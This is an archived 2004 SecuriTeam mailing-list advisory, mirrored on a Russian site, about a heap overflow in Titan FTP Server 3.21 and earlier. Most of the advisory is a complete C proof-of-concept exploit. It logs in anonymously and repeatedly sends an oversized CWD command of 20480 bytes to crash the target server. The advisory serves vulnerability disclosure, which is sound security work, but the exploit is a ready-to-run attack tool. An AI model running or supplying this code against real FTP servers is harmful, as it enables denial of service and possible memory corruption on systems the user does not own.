The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[NT] Titan FTP Server Heap Overflow


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 31 Aug 2004 17:56:38 +0200
From: SecuriTeam <[email protected]>
To: [email protected]
Subject: [NT] Titan FTP Server Heap Overflow

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Titan FTP Server Heap Overflow
------------------------------------------------------------------------


SUMMARY

A security vulnerability exists in South River Technologies' Titan FTP 
Server, by issuing an arbitrary long command, a command followed by 20480 
bytes, it is possible to cause the remote server to overflow its internal 
heap space.

DETAILS

Vulnerable Systems:
 * Titan FTP Server version 3.21 and prior

A vulnerability has been found in Titan FTP Server. Sending a command with 
20480 bytes to target can trigger the problem.

Example:
"CWD xxxxxxxxxxx..."
"LIST xxxxxxxxxxx..."
"STAT xxxxxxxxxxx..."
...

Exploit:
/*
*-----------------------------------------------------------------------
*
* titanftp.c - TiTan FTP Server Long Command Heap Overflow PoC Exploit
*
* Copyright (C) 2000-2004 HUC All Rights Reserved.
*
* Author : lion
* : [email protected]
* : http://www.cnhonker.com
* Date : 2004-08-30
*
*-----------------------------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

#define FTPPORT 21
#define BUFFSIZE 204800
#define OVERFLOWSIZE 20480
#define SIZE 2048

// function
int create_socket();
int client_connect(int sockfd,char* server,int port);
int writebuf(char *s,int socket,char *buffer,int len);
int readbuf(char *s,int socket,char *buffer,int len);
void checkstatus(char *s);
void loginftp(SOCKET sockfd, char *user, char *pass);

int show = 1;
char recvbuf[BUFFSIZE];
char sendbuf[BUFFSIZE];

void main(int argc, char *argv[])
{
   WSADATA wsa;
   unsigned short port;
   unsigned long ip;
   char user[32] = "anonymous";
   char pass[32] = "anonymous";
   
   char *command = "CWD ";

   SOCKET s;
   int size = OVERFLOWSIZE;

   printf("TiTan FTP Server Long Command Heap Overflow PoC Exploit\r\n");
   printf("lion lion#cnhonker.net, http://www.cnhonker.com\r\n\n");

   if(argc < 3)
   {
       printf("%s <TargetHost> <TargetPort>\r\n", argv[0]);
       return;
   }
   
   WSAStartup(MAKEWORD(2,2),&wsa);

   while(1)
   {
       if((s=create_socket())==0)
       {
           printf("[-] ERROR: Create socket failed.\r\n");
           return;
       }
     
       if(!client_connect(s, argv[1], atoi(argv[2])))
           exit(-1);
   
       loginftp(s, user, pass);
   
       memset(sendbuf, 0 ,BUFFSIZE);
       memcpy(sendbuf, "pasv\r\n", 6);
       writebuf("Send pasv", s, sendbuf, 6);
       readbuf("read", s, recvbuf, BUFFSIZE);
   
       memset(sendbuf, 0, BUFFSIZE);
       memset(sendbuf, 'A', size);
       memcpy(sendbuf, command, strlen(command));
       sendbuf[size-2] ='\r';
       sendbuf[size-1] ='\n';
   
       printf("buff size :%d\r\n%s\r\n", strlen(sendbuf), sendbuf);
       show=1;
       writebuf("Send overflow buff", s, sendbuf, size);
       readbuf("read", s, recvbuf, BUFFSIZE);
       
       //send QUIT
       memset(sendbuf,0, BUFFSIZE);
       sprintf(sendbuf, "%s\r\n", "QUIT");
       writebuf("Send QUIT", s, sendbuf, strlen(sendbuf));
   
       //show=1;
       //readbuf("[+] QUIT......", s, recvbuf, BUFFSIZE);
       //return;
       
       if(s)
           closesocket(s);
           
       Sleep(2000);
   }
   
   WSACleanup();
}

int create_socket()
{
   int sockfd;
 
   sockfd=socket(AF_INET,SOCK_STREAM,0);
   if(sockfd<0)
   {
       printf("[-] Create socket error.\r\n");
       return(0);
   }
   
   return(sockfd);
}

int client_connect(int sockfd,char* server,int port)
{
   struct sockaddr_in cliaddr;
   struct hostent *host;

   if((host=gethostbyname(server))==NULL)
   {
       printf("[-] ERROR: gethostbyname(%s) error\n", server);
       return(-1);
   }
   
   memset(&cliaddr, 0, sizeof(struct sockaddr));

   cliaddr.sin_family=AF_INET;
   cliaddr.sin_port=htons(port);
   cliaddr.sin_addr=*((struct in_addr *)host->h_addr);
   printf("[+] Trying %s:%d......", server, port);
   fflush(stdout);

   if(connect(sockfd,(struct sockaddr *)&cliaddr,sizeof(struct 
sockaddr))<0)
   {
       printf("FAILED!\r\n");
       closesocket(sockfd);
       return(-1);
   }

   printf("OK!\r\n");
   return(1);
}

int writebuf(char *s,int socket,char *buffer,int len)
{
   int j;

   if(s)
   {
       printf("[+] %s......", s);
       fflush(stdout);
   }

   j=send(socket,buffer,len,0);
   if(j<=0)
   {
       printf("FAILED!\r\n");
           exit(-1);
   }
   printf("OK!\r\n");
   return j;
}

int readbuf(char *s,int socket,char *buffer,int len)
{
   int a,b,i,j=0;
   
   a=b=i=0;
   memset(buffer,0,len);

   if(s)
   {
       printf("[+] %s......", s);
       fflush(stdout);
   }

   j=recv(socket,buffer,len-1,0);
   if(j <= 0)
   {
       if(s) printf("FAILED!\n");
           printf("[-] Recv data error.\n");
       exit(-1);
   }
       
   if(s) printf("OK!\n");

   buffer[len-1]='\0';

   if(show==1) printf("<==\r\n%s<==\r\n",buffer);

   return j;
}

void checkstatus(char *s)
{
   if(s==NULL) exit(-1);
   if(isdigit(*s))
   {
       if(s[0]=='5')
       {
           printf("[-] Server told:%s\n",s);
           exit(-1);
       }
       else return;
   }

   printf("[-] Server said:%s\n",s);
   exit(-1);
}

void loginftp(SOCKET sockfd, char *user, char *pass)
{
   int j;
   
   show=1;
   readbuf("Get FTP Server banner",sockfd, recvbuf, SIZE);
   //show=0;

   //send USER username
   memset(sendbuf,0,BUFFSIZE);
   j=sprintf(sendbuf,"%s %s\r\n", "USER", user);
   writebuf("Send USER", sockfd,sendbuf,j);
   readbuf(NULL,sockfd, recvbuf, BUFFSIZE);
   checkstatus(recvbuf);

   //send PASS password
   memset(sendbuf,0,BUFFSIZE);
   j=sprintf(sendbuf,"%s %s\r\n","PASS", pass);
   writebuf("Send PASS", sockfd, sendbuf, j);
   readbuf(NULL,sockfd,recvbuf, BUFFSIZE);
   checkstatus(recvbuf);
   printf("[+] User %s logged in.\r\n", user);
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:[email protected]> lion.
The original article can be found at:  
<http://www.cnhonker.com/index.php?module=releases&act=view&type=2&id=62>; 
http://www.cnhonker.com/index.php?module=releases&act=view&type=2&id=62




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру